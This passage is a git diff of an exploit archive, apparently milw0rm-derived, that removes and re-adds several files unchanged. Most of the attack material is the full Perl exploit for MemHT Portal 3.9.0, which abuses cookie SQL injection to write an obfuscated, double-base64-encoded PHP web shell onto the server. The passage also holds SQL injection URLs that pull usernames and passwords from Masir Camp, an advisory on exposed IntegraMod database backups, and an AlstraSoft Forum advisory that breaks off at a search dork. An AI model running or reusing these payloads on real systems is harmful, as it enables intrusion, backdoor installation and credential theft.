- yildirimordulari.org - - - z0rlu.blogspot.com ############################## + +thanx: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs + +Efsane: YILDIRIMORDULARI.ORG + +Yemisim Alaskasini : ) ) insan1n kendi memleketi gibisi yokk : ) ) + +########## ZoRLu - - - yildirimordulari.org - - - z0rlu.blogspot.com ############################## + +# milw0rm.com [2008-09-06] 
diff --git a/platforms/php/webapps/6390.txt b/platforms/php/webapps/6390.txt
index 723a9b4eb..ba09953f2 100755
--- a/platforms/php/webapps/6390.txt
+++ b/platforms/php/webapps/6390.txt
@@ -1,21 +1,21 @@
-today i found some major security problem. the issue can be found at all integramod 1.4.x versions.
-explanation of the issue:
-
-all integramod versions do have a backup folder where the daily database backups are stored. the coders
-of integramod forgott to secure this folder.
-
-example:
-just head to the official page of integramod www.integramod.com. you are being redirected
-to http://www.integramod.com/forum/ . now just head into the backup folder: http://www.integramod.com/forum/backup.
-As you can see you have full access to all database backups!
--> www.pagename/installpath/backup/ directly leads to the database backups!
-notice: some versions do have a index.html in the folder but it is easy to get the backups any way
-bacause they are alway stored in the dame format:
-backup-yyyy-dd-mm.sql
-
-
-greetings from germany
-
-TheJT
-
-# milw0rm.com [2008-09-06]
+today i found some major security problem. the issue can be found at all integramod 1.4.x versions.
+explanation of the issue:
+
+all integramod versions do have a backup folder where the daily database backups are stored. the coders
+of integramod forgott to secure this folder.
+
+example:
+just head to the official page of integramod www.integramod.com. you are being redirected
+to http://www.integramod.com/forum/ . now just head into the backup folder: http://www.integramod.com/forum/backup.
+As you can see you have full access to all database backups!
+-> www.pagename/installpath/backup/ directly leads to the database backups!
+notice: some versions do have a index.html in the folder but it is easy to get the backups any way
+bacause they are alway stored in the dame format:
+backup-yyyy-dd-mm.sql
+
+
+greetings from germany
+
+TheJT
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6392.php b/platforms/php/webapps/6392.php
index b632fa57a..4809ac9b1 100755
--- a/platforms/php/webapps/6392.php
+++ b/platforms/php/webapps/6392.php
@@ -1,141 +1,141 @@
-
-
-# milw0rm.com [2008-09-06]
+
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6393.pl b/platforms/php/webapps/6393.pl
index 8121d32d2..d90c88a8b 100755
--- a/platforms/php/webapps/6393.pl
+++ b/platforms/php/webapps/6393.pl
@@ -1,193 +1,193 @@ -#!/usr/bin/perl -# -# MemHT Portal <= 3.9.0 Perl exploit -# -# discovered & written by Ams -# ax330d [doggy] gmail [dot] com -# -# DESCRIPTION: -# Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's, -# ($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make -# sql injection. -# This exploit tries to create shell in /uploads/media/defined.php. -# -# NEEDED: -# magic_quotes_gpc = off -# MySQL should be able to write to file -# Know full server path to portal - -use strict; -use warnings; -use IO::Socket; - -print " - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - MemHT portal <= 3.9.0 Perl exploit - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - "; - -@ARGV or &usage ; -my $expl_url = shift; -$expl_url =~ m#http://# or &usage; -my $serv_path = shift || '-b'; -my $def_shell = '/uploads/media/defined.php'; - -my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q' -.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ' -.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4' -.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk' -.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX' -.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth' -.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53' -.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO' -.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp' -.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV' 
-.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu' -.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow' -.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT' -.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ' -.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU' -.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa' -.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH' -.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa' -.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr' -.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN' -.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt' -.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP' -.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3' -.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0' -.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y' -.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ' -.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2' -.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds' -.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT' 
-.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ' -.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4' -.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ' -.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT' -.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa' -.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw' -.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK' -.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH' -.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27' -.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B'; - -# You can add more :P -my @paths = qw( - /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts - /home/www home/httpd/vhosts - /usr/local/apache/htdocs - /www/htdocs -); - -if($serv_path ne '-b') { - @paths = ($serv_path); -} - -exploit($expl_url); - -sub exploit { - - # Defining vars. - my $url = pop @_; - - print "\n\tExploiting $url\n"; - - my($host, $path, $packet, $rcvd); - $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e; - - # Trying to get /cron.php to get server path - $packet = "POST $path/cron.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - $rcvd = send_pckt($host, $packet, 1); - - if( ! 
$rcvd) { - print "\n\tUnable to connect to http://$host\n\n"; - exit; - } - if ($rcvd =~ /Undefined variable:/) { - $rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/; - @paths = ($1); - print "\n\tFound path!\n"; - } else { - print "\n\tStarting bruteforce...\n"; - } - - # Some bruteforce here if path is not defined - foreach $serv_path (@paths) { - - print ("\n\tTesting $serv_path$path$def_shell ...\n"); - # Sending poisoned request - $packet = "POST $path/index.php HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - - if( ! send_pckt($host, $packet)) { - print "\n\tUnable to connect to http://$host\n\n"; - exit; - } - } - - # Checking for shell presence - $packet = "POST $path$def_shell HTTP/1.1\r\n"; - $packet .= "Host: $host\r\n"; - $packet .= "Connection: Close\r\n"; - $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n"; - - sleep(1); - $rcvd = send_pckt($host, $packet, 1); - if( ! $rcvd) { - print "\n\tUnable to connect to http://$host\n\n"; - exit; - } - - if ($rcvd =~ /tmp\s+shell/) { - print "\n\tExploited!\n\n"; - } else { - print "\n\tExploiting failed.\n\n"; - } - -} - -sub send_pckt() { - - my $dat = 1; - my ($host, $packet, $ret) = @_; - my $socket = IO::Socket::INET->new( - Proto=>"tcp", - PeerAddr=>$host, - PeerPort=>"80" - ); - if( ! 
$socket) { - return 0; - } else { - - print $socket $packet; - if($ret) { - my $rcv; - while($rcv = <$socket>) { - $dat .= $rcv; - } - } - close $socket; - return $dat; - } -} - -sub usage { - print "\n\tUsage:\texpl.pl host [-b|full server path] - - (by default exlpoit checks /cron.php file errors to get real path, - otherwise it will brute if failed, if used -b or none path is mentioned) - - Example:\t$0 http://localhost/ /var/www/htdocs - $0 http://localhost/ -b - $0 http://localhost/\n\n"; - exit; -} - -# milw0rm.com [2008-09-06] +#!/usr/bin/perl +# +# MemHT Portal <= 3.9.0 Perl exploit +# +# discovered & written by Ams +# ax330d [doggy] gmail [dot] com +# +# DESCRIPTION: +# Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's, +# ($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make +# sql injection. +# This exploit tries to create shell in /uploads/media/defined.php. +# +# NEEDED: +# magic_quotes_gpc = off +# MySQL should be able to write to file +# Know full server path to portal + +use strict; +use warnings; +use IO::Socket; + +print " + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + MemHT portal <= 3.9.0 Perl exploit + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + "; + +@ARGV or &usage ; +my $expl_url = shift; +$expl_url =~ m#http://# or &usage; +my $serv_path = shift || '-b'; +my $def_shell = '/uploads/media/defined.php'; + +my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q' +.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ' +.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4' +.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk' +.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX' 
+.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth' +.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53' +.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO' +.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp' +.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV' +.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu' +.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow' +.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT' +.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ' +.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU' +.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa' +.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH' +.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa' +.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr' +.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN' +.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt' +.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP' +.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3' +.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0' 
+.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y' +.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ' +.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2' +.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds' +.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT' +.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ' +.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4' +.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ' +.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT' +.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa' +.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw' +.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK' +.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH' +.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27' +.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B'; + +# You can add more :P +my @paths = qw( + /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts + /home/www home/httpd/vhosts + /usr/local/apache/htdocs + /www/htdocs +); + +if($serv_path ne '-b') { + @paths = ($serv_path); +} + +exploit($expl_url); + +sub exploit { + + # Defining vars. 
+ my $url = pop @_;
+
+ print "\n\tExploiting $url\n";
+
+ my($host, $path, $packet, $rcvd);
+ $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;
+
+ # Trying to get /cron.php to get server path
+ $packet = "POST $path/cron.php HTTP/1.1\r\n";
+ $packet .= "Host: $host\r\n";
+ $packet .= "Connection: Close\r\n";
+ $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+ $rcvd = send_pckt($host, $packet, 1);
+
+ if( ! $rcvd) {
+ print "\n\tUnable to connect to http://$host\n\n";
+ exit;
+ }
+ if ($rcvd =~ /Undefined variable:/) {
+ $rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;
+ @paths = ($1);
+ print "\n\tFound path!\n";
+ } else {
+ print "\n\tStarting bruteforce...\n";
+ }
+
+ # Some bruteforce here if path is not defined
+ foreach $serv_path (@paths) {
+
+ print ("\n\tTesting $serv_path$path$def_shell ...\n");
+ # Sending poisoned request
+ $packet = "POST $path/index.php HTTP/1.1\r\n";
+ $packet .= "Host: $host\r\n";
+ $packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";
+ $packet .= "Connection: Close\r\n";
+ $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+
+ if( ! send_pckt($host, $packet)) {
+ print "\n\tUnable to connect to http://$host\n\n";
+ exit;
+ }
+ }
+
+ # Checking for shell presence
+ $packet = "POST $path$def_shell HTTP/1.1\r\n";
+ $packet .= "Host: $host\r\n";
+ $packet .= "Connection: Close\r\n";
+ $packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
+
+ sleep(1);
+ $rcvd = send_pckt($host, $packet, 1);
+ if( ! $rcvd) {
+ print "\n\tUnable to connect to http://$host\n\n";
+ exit;
+ }
+
+ if ($rcvd =~ /tmp\s+shell/) {
+ print "\n\tExploited!\n\n";
+ } else {
+ print "\n\tExploiting failed.\n\n";
+ }
+
+}
+
+sub send_pckt() {
+
+ my $dat = 1;
+ my ($host, $packet, $ret) = @_;
+ my $socket = IO::Socket::INET->new(
+ Proto=>"tcp",
+ PeerAddr=>$host,
+ PeerPort=>"80"
+ );
+ if( !
$socket) {
+ return 0;
+ } else {
+
+ print $socket $packet;
+ if($ret) {
+ my $rcv;
+ while($rcv = <$socket>) {
+ $dat .= $rcv;
+ }
+ }
+ close $socket;
+ return $dat;
+ }
+}
+
+sub usage {
+ print "\n\tUsage:\texpl.pl host [-b|full server path]
+
+ (by default exlpoit checks /cron.php file errors to get real path,
+ otherwise it will brute if failed, if used -b or none path is mentioned)
+
+ Example:\t$0 http://localhost/ /var/www/htdocs
+ $0 http://localhost/ -b
+ $0 http://localhost/\n\n";
+ exit;
+}
+
+# milw0rm.com [2008-09-06]
diff --git a/platforms/php/webapps/6395.txt b/platforms/php/webapps/6395.txt
index 10c742b78..7973912d6 100755
--- a/platforms/php/webapps/6395.txt
+++ b/platforms/php/webapps/6395.txt
@@ -1,45 +1,45 @@ -########################## www.BugReport.ir ####################################### -# -# AmnPardaz Security Research Team -# -# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection -# Vendor: www.masir.net -# Vulnerable Version: 3.0 and prior versions -# Exploit: Available -# Impact: Medium -# Fix: N/A -# Original Advisory: http://bugreport.ir/index_52.htm -################################################################################### - -#################### -1. Description: -#################### - Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation. -"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs. - -#################### -2. Vulnerabilities: -#################### - 2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter. - - -#################### -3. Exploits/POCs: -#################### - http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)-- - http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)-- - -#################### -4. Solution: -#################### - Edit the source code to ensure that inputs are properly sanitized. - -#################### -5. 
Credit: -#################### -AmnPardaz Security Research & Penetration Testing Group -Contact: admin[4t}bugreport{d0t]ir -www.BugReport.ir -www.AmnPardaz.com - -# milw0rm.com [2008-09-07] +########################## www.BugReport.ir ####################################### +# +# AmnPardaz Security Research Team +# +# Title: Masir Camp E-Shop Module <= 3.0 SQL Injection +# Vendor: www.masir.net +# Vulnerable Version: 3.0 and prior versions +# Exploit: Available +# Impact: Medium +# Fix: N/A +# Original Advisory: http://bugreport.ir/index_52.htm +################################################################################### + +#################### +1. Description: +#################### + Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation. +"Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs. + +#################### +2. Vulnerabilities: +#################### + 2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter. + + +#################### +3. Exploits/POCs: +#################### + http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)-- + http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)-- + +#################### +4. Solution: +#################### + Edit the source code to ensure that inputs are properly sanitized. + +#################### +5. Credit: +#################### +AmnPardaz Security Research & Penetration Testing Group +Contact: admin[4t}bugreport{d0t]ir +www.BugReport.ir +www.AmnPardaz.com + +# milw0rm.com [2008-09-07] diff --git a/platforms/php/webapps/6396.txt b/platforms/php/webapps/6396.txt index 569caf772..9a21abb13 100755 --- a/platforms/php/webapps/6396.txt +++ b/platforms/php/webapps/6396.txt 
@@ -1,61 +1,61 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# -# --- QKrun1x - skillfaker - FeDeReR - Optyx - Nuclear -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l and P47r1ck -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com -# -# Share the c0de! -# -################################################################ -# -# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability -# -# -# App Name: AlstraSoft Forum -# -# App Home: http://www.alstrasoft.com/ -# -# Dork: inurl:index.php?menu=showcat= -# Dork2: 